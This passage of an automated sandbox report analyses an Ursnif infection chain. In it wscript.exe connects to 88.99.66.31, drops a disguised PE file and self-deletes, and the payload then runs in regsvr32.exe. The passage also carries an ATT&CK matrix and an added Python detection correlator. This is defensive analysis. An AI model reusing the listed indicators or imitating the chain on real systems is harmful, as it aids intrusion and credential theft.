Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.810134979.0000022D69F00000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.828666273.0000022D6CE80000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72FF1BB9 GetSystemTimeAsFileTime, _aulldiv, _snwprintf, CreateFileMappingW, GetLastError, GetLastError, LdrInitializeThunk, MapViewOfFile, GetLastError, CloseHandle, GetLastError 3_2_72FF1BB9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7302E4D0 mov eax, dword ptr fs:[00000030h] 3_2_7302E4D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7302E406 mov eax, dword ptr fs:[00000030h] 3_2_7302E406
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7302E010 push dword ptr fs:[00000030h] 3_2_7302E010
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72FF1E95 InitializeCriticalSection, TlsAlloc, RtlAddVectoredExceptionHandler, GetLastError 3_2_72FF1E95

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: share.pea.0.dr

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187

Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp; regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp; regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp; regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.1192048299.0000000001980000.00000002.00000001.sdmp; regsvr32.exe, 00000003.00000002.1193329977.0000000003590000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
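The signatures in this report describe one chain: wscript.exe writes a PE-bodied file under a non-PE name (share.pea), connects out to 88.99.66.31, deletes its own .vbs, and the payload then runs inside regsvr32.exe (PID 5588, where the Ursnif Yara rules match). The following is an added example, not part of the sandbox report or its vendor's tooling: a small Python correlator that encodes those four observations as rules and runs them over a constructed, Sysmon-style event timeline. The event schema, the wscript.exe PID, the drop directory under %TEMP%, the destination port and the regsvr32 command line are assumptions; the report itself gives only the file name share.pea, the IP address, and the regsvr32.exe PID.

```python
"""Correlate endpoint telemetry for a wscript.exe -> dropped PE -> regsvr32.exe chain.

Added example, not part of the sandbox report. The event schema is a simplified,
constructed Sysmon-like model and SAMPLE below is invented to mirror the behaviour
the report lists; it is not the report's raw log data.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PE_EXTENSIONS = {".exe", ".dll", ".ocx", ".scr", ".sys", ".cpl", ".drv"}
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}


@dataclass
class Event:
    seq: int            # position in the host timeline
    kind: str           # ProcessCreate | FileCreate | FileDelete | NetworkConnect | ImageLoad
    image: str          # full path of the acting process
    pid: int
    target: str = ""    # file path, loaded module path, or "ip:port"
    cmdline: str = ""   # ProcessCreate only
    magic: bytes = b""  # first bytes of a created file, if the sensor captured them


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ext(path: str) -> str:
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def in_user_profile(path: str) -> bool:
    """Heuristic: user-writable locations a COM server should never be loaded from."""
    p = path.lower()
    return "\\users\\" in p and any(s in p for s in ("\\appdata\\", "\\temp\\", "\\desktop\\", "\\downloads\\"))


def script_host_drops_masqueraded_pe(events):
    """Script host writes a file whose content starts with MZ but whose extension is not a PE one."""
    return [("script_host_drops_pe", e.pid, e.target) for e in events
            if e.kind == "FileCreate" and basename(e.image) in SCRIPT_HOSTS
            and e.magic.startswith(b"MZ") and ext(e.target) not in PE_EXTENSIONS]


def script_host_self_delete(events):
    """Script host deletes the script file it was started with."""
    started_with = {}
    for e in events:
        if e.kind == "ProcessCreate" and basename(e.image) in SCRIPT_HOSTS:
            for tok in e.cmdline.split('"'):          # crude: the quoted argument with a script extension
                if ext(tok) in SCRIPT_EXTENSIONS:
                    started_with[e.pid] = tok.lower()
    return [("script_host_self_delete", e.pid, e.target) for e in events
            if e.kind == "FileDelete" and started_with.get(e.pid) == e.target.lower()]


def regsvr32_loads_script_dropped_file(events):
    """regsvr32.exe loads, from a user-profile path, a module a script host created earlier."""
    dropped, hits = set(), []
    for e in events:                                   # single pass relies on seq ordering
        if e.kind == "FileCreate" and basename(e.image) in SCRIPT_HOSTS:
            dropped.add(e.target.lower())
        elif (e.kind == "ImageLoad" and basename(e.image) == "regsvr32.exe"
              and e.target.lower() in dropped and in_user_profile(e.target)):
            hits.append(("regsvr32_loads_dropped_module", e.pid, e.target))
    return hits


def script_host_public_network(events):
    """Script host connects to a globally routable address."""
    return [("script_host_public_connect", e.pid, e.target) for e in events
            if e.kind == "NetworkConnect" and basename(e.image) in SCRIPT_HOSTS
            and ipaddress.ip_address(e.target.rsplit(":", 1)[0]).is_global]


def triage(events):
    """Run every rule over the ordered timeline; score = number of distinct rules hit."""
    ordered = sorted(events, key=lambda e: e.seq)
    findings = (script_host_drops_masqueraded_pe(ordered) + script_host_self_delete(ordered)
                + regsvr32_loads_script_dropped_file(ordered) + script_host_public_network(ordered))
    return {"score": len({f[0] for f in findings}), "findings": findings}


# Constructed timeline modelled on the report's chain. Assumed, not taken from the report:
# the wscript.exe PID, the drop directory, the destination port and the regsvr32 command line.
SAMPLE = [
    Event(1, "ProcessCreate", r"C:\Windows\System32\wscript.exe", 4100,
          cmdline=r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\view_presentation#_52197.vbs"'),
    Event(2, "NetworkConnect", r"C:\Windows\System32\wscript.exe", 4100, target="88.99.66.31:443"),
    Event(3, "FileCreate", r"C:\Windows\System32\wscript.exe", 4100,
          target=r"C:\Users\user\AppData\Local\Temp\share.pea", magic=b"MZ\x90\x00"),
    Event(4, "FileDelete", r"C:\Windows\System32\wscript.exe", 4100,
          target=r"C:\Users\user\Desktop\view_presentation#_52197.vbs"),
    Event(5, "ProcessCreate", r"C:\Windows\SysWOW64\regsvr32.exe", 5588,
          cmdline=r'regsvr32.exe /s "C:\Users\user\AppData\Local\Temp\share.pea"'),
    Event(6, "ImageLoad", r"C:\Windows\SysWOW64\regsvr32.exe", 5588,
          target=r"C:\Users\user\AppData\Local\Temp\share.pea"),
]

if __name__ == "__main__":
    result = triage(SAMPLE)
    print(f"score={result['score']}")
    for rule, pid, what in result["findings"]:
        print(f"  {rule:<32} pid={pid} {what}")
```

Each rule on its own is noisy (a script host fetching from a public IP is common in login scripts; regsvr32 loading from a user profile happens with some legitimate installers), so the score counts distinct rules rather than raw hits: the full chain scores 4, while any single behaviour scores 1 and can be held back for enrichment. The self-delete rule keys on the exact script path from the process command line, which is why the report's observation that wscript.exe deleted c:\users\user\desktop\view_presentation#_52197.vbs maps to it directly.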

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA, GetSystemDefaultUILanguage, VerLanguageNameA 3_2_72FF1E58
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BE350A cpuid 3_2_02BE350A
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\pickup.zip VolumeInformation (11 identical entries)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72FF1BB9 GetSystemTimeAsFileTime, _aulldiv, _snwprintf, CreateFileMappingW, GetLastError, GetLastError, LdrInitializeThunk, MapViewOfFile, GetLastError, CloseHandle, GetLastError 3_2_72FF1BB9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BE350A wsprintfA, RtlAllocateHeap, GetUserNameW, RtlAllocateHeap, GetUserNameW, HeapFree, GetComputerNameW, GetComputerNameW, RtlAllocateHeap, GetComputerNameW, HeapFree 3_2_02BE350A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72FF177C CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError 3_2_72FF177C
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

Mitre Att&ck Matrix

Techniques are listed per tactic column. Bracketed digits are the report's signature-count badges, reproduced as extracted; where the extraction ran adjacent badges together (e.g. [121]), the digits may belong to more than one badge.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise
Execution: Windows Management Instrumentation [31]; Scripting [121]; Execution through API [2]; Exploitation for Client Execution [1]; Graphical User Interface [1]; Graphical User Interface; Scripting; Third-party Software; Rundll32
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking
Privilege Escalation: Process Injection [12]; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness
Defense Evasion: Masquerading [11]; Virtualization/Sandbox Evasion [1]; Process Injection [12]; Scripting [121]; File Deletion [1]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; Indicator Blocking; Process Injection
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt
Discovery: System Time Discovery [1]; Virtualization/Sandbox Evasion [1]; Process Discovery [1]; Account Discovery [1]; System Owner/User Discovery [1]; Security Software Discovery [11]; Remote System Discovery [1]; File and Directory Discovery [3]; System Information Discovery [46]
Lateral Movement: Remote File Copy [3]; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection; Clipboard Data; Automated Collection
Exfiltration: Data Encrypted [1]; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium
Command and Control: Standard Cryptographic Protocol [12]; Remote File Copy [3]; Standard Non-Application Layer Protocol [3]; Standard Application Layer Protocol [4]; Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port; Standard Application Layer Protocol; Multilayer Encryption
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

[Interactive behavior graph, ID 241209; not reproduced. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.]